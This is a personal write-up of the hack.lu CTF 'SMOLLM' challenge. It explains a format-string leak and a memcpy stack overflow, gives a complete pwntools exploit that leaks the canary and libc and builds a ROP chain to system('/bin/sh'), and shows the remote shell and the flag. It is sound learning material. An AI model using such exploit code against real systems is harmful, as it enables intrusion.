index

Background Information

Hi, it’s been a minute since I’ve wrote a writeup or anything. Anyways, I had some free time during break to play CTF, and this week it was hack.lu ctf by Flux Fingers! I played with PPP.

SMOLLM

So we are given a binary, source, and libc. First thing to do is just skim over the code and find any low-hanging fruit.

We run checksec and find out the binary in pretty well protected:

File:     /home/jake/hackluctf/SMOLLM/smollm
Arch:     amd64
RELRO:      Full RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        PIE enabled
RUNPATH:    b'.'
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

The basic overview of the program is:

Add custom tokens
Write something small and have the program print out tokens

Format String

So first off, there is a format string vulnerability in run_prompt:

1
void run_prompt() {
2
    int n;
3
    static unsigned int combinator = 0;
4
    char in_buf[256], out_buf[256];
5
    bzero(in_buf, sizeof(in_buf));
6
    bzero(out_buf, sizeof(in_buf));
7

8
    printf("How can I help you?\n>");
9
    n = read(STDIN_FILENO, in_buf, sizeof(in_buf));
10
    if (n <= 0) {
11
        printf("Read error\n");
12
        exit(-1);
13
    }
14
    for (int i = 0; i < n; i++) {
15
        memcpy(&out_buf[i*TOKEN_SIZE], tokens[(in_buf[i] + combinator++) % n_tokens], TOKEN_SIZE);
16
    }
17
    printf(out_buf); //printf vulnerability in this code
18
    printf("\n");
19
}

Essentially, we can leak values in the stack since the printf doesn’t have a specifier. We can leverage this to leak libc, pie, canary, stack, etc.

memcpy bug

There is also another bug in run_prompt where memcpy can copy a buffer much larger than out_buf, causing an overflow:

1
printf("How can I help you?\n>");
2
n = read(STDIN_FILENO, in_buf, sizeof(in_buf));
3
if (n <= 0) {
4
    printf("Read error\n");
5
    exit(-1);
6
}
7
for (int i = 0; i < n; i++) {
8
    memcpy(&out_buf[i*TOKEN_SIZE], tokens[(in_buf[i] + combinator++) % n_tokens], TOKEN_SIZE);
9
}

out_buf is only 256 bytes, however we can add in custom tokens, which when copied over by in_buf[i] + combinator++ would allow us to write past the out_buf and gain control flow. However, do note that the specific tokesn that are copied relies on the mod of the number of tokens, so we do have to calculate what specific characters to use to trigger our custom tokens to be used rather than the system’s.

We can use this to “ROP” or reuse instructions when controlling RIP to gain control flow, although I used libc gadgets because the program was missing essential instructions like pop rdi.

Exploitation

So with this knowledge, we have a pretty simple process of exploitation:

Add %p format string specifiers as tokens to leak out pointers in the stack
Calculate a specific prompt so that printf(out_buf) will print out the %p tokens
Collect info leaks, particularly canary and libc
Calculate the libc addresses for system(), /bin/sh, pop rdi, and ret
Use the token functionality to add back a ROP chain as custom tokens
Calculate a prompt payload so that our rop chain gets copied
Enjoy the shell!

1
#!/usr/bin/env python3
2
from pwn import *
3
context.arch = 'amd64'
4
# Set the log level to debug to see all the I/O
5
context.log_level = 'info' # Change to 'debug' for more verbosity
6

7
elf = ELF('./smollm_patched')
8
libc = ELF('./libc.so.6')
9

10
if 'REMOTE' in args:
11
    r = remote('SMOLLM.flu.xxx', 1024)
12
else:
13
    r = process(elf.path)
14

15
if 'GDB' in args:
16
    gdb.attach(r, """
17
    b *main+274
18
    continue
19
""")
20

21
# --- Add a single token for our leak ---
22

23
leak_token = b'%p'*3
24
r.sendlineafter(b'>', b'1')
25
r.sendlineafter(b'token?>', leak_token)
26

27
# --- Craft a trigger string to leak the maximum "safe" number of values ---
28
# out_buf is 256 bytes, TOKEN_SIZE is 8. Max tokens = 256 / 8 = 32.
29
num_leaks = 32
30
target_index = 106
31
n_tokens = 107
32
trigger_string = b""
33
for i in range(num_leaks):
34
    char_code = (target_index - i) % n_tokens
35
    trigger_string += bytes([char_code])
36
# --- Run the prompt and trigger the leak ---
37
r.sendlineafter(b'>', b'2')
38
r.sendlineafter(b'>', trigger_string)
39
leak_output = r.recvuntil(b'Do you want to')
40

41
leaks = leak_output.split(b'0x')
42
leaks = [(b'0x'+i).strip() for i in leaks if not i.isspace()]
43

44
libc.address = int(leaks[leaks.index(b'0x1(nil)')+1], 16) - 8650 - 0x28000
45
log.info("libc base address: " + hex(libc.address))
46

47
leaks = [(i).replace(b'(nil)', b' ').replace(b'.', b' ').strip() for i in leaks]
48
canary = next((addr for addr in leaks if (addr.endswith(b'00'))), None)
49
canary = int(canary, 16)
50
log.info("canary value: " + hex(canary))
51

52
rop = ROP([libc])
53
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]
54
ret = rop.find_gadget(['ret'])[0]
55
system = libc.symbols['system']
56
bin_sh = libc.search(b'/bin/sh').__next__()
57

58

59
log.info("ret address: " + hex(ret))
60
log.info("pop rdi address: " + hex(pop_rdi))
61
log.info("system address: " + hex(system))
62
log.info("bin sh address: " + hex(bin_sh))
63

64

65
# fill in the out_buf buffer?
66
for i in range(4):
67
    r.sendlineafter(b'>', b'1')
68
    r.sendafter(b'>', b'A'*8)
69

70
# place canary
71
r.sendlineafter(b'>', b'1')
72
r.sendafter(b'>', p64(canary))
73

74
# place padding?
75
r.sendlineafter(b'>', b'1')
76
r.sendafter(b'>', b'A'*8)
77

78
r.sendlineafter(b'>', b'1')
79
r.sendafter(b'>', p64(ret))
80

81
#pop rdi
82
r.sendlineafter(b'>', b'1')
83
r.sendafter(b'>', p64(pop_rdi))
84

85
# place binsh
86
r.sendlineafter(b'>', b'1')
87
r.sendafter(b'>', p64(bin_sh))
88

89
# place system
90
r.sendlineafter(b'>', b'1')
91
r.sendafter(b'>', p64(system))
92

93
r.sendlineafter(b'>', b'2')
94

95
total_tokens_needed = 32 + 10  # Adjust based on actual stack layout
96

97
rop_trigger = b""
98
combinator_offset = 32
99
n_tokens = 118+1  # 107 + 11
100
for i in range(total_tokens_needed):
101
    target_token = 107 + (i % 10)  # Cycle through your ROP tokens
102
    char_code = (target_token - combinator_offset - i) % n_tokens
103
    rop_trigger += bytes([char_code])
104

105
r.sendafter(b'>', rop_trigger)
106

107
r.interactive()

And… we get flag:

jake@LAPTOP-5K5LHSPO:~/hackluctf/SMOLLM$ python3 solve.py REMOTE
[*] '/home/jake/hackluctf/SMOLLM/smollm_patched'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'.'
[*] '/home/jake/hackluctf/SMOLLM/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to SMOLLM.flu.xxx on port 1024: Done
[*] libc base address: 0x76935a2ca000
[*] canary value: 0xf8a3c5ee8929bf00
[*] Loaded 111 cached gadgets for './libc.so.6'
[*] ret address: 0x76935a2f282f
[*] pop rdi address: 0x76935a3d978b
[*] system address: 0x76935a322750
[*] bin sh address: 0x76935a49542f
[*] Switching to interactive mode
AAAAAAAAAAAAAAAAAAAAAAAA
$ ls
flag
ld-linux-x86-64.so.2
libc.so.6
smollm
ynetd
$ cat flag
flag{w3_4re_ou7_0f_7ok3n5,sorry:171cec579a6ccf7ab7eba1b8cd2ee12c}
$

flag{w3_4re_ou7_0f_7ok3n5,sorry:171cec579a6ccf7ab7eba1b8cd2ee12c}

Conclusion

A bit of a fun break from homework and studying! Hopefully this sparks some kind of ctf lock in, especially during my time in PPP…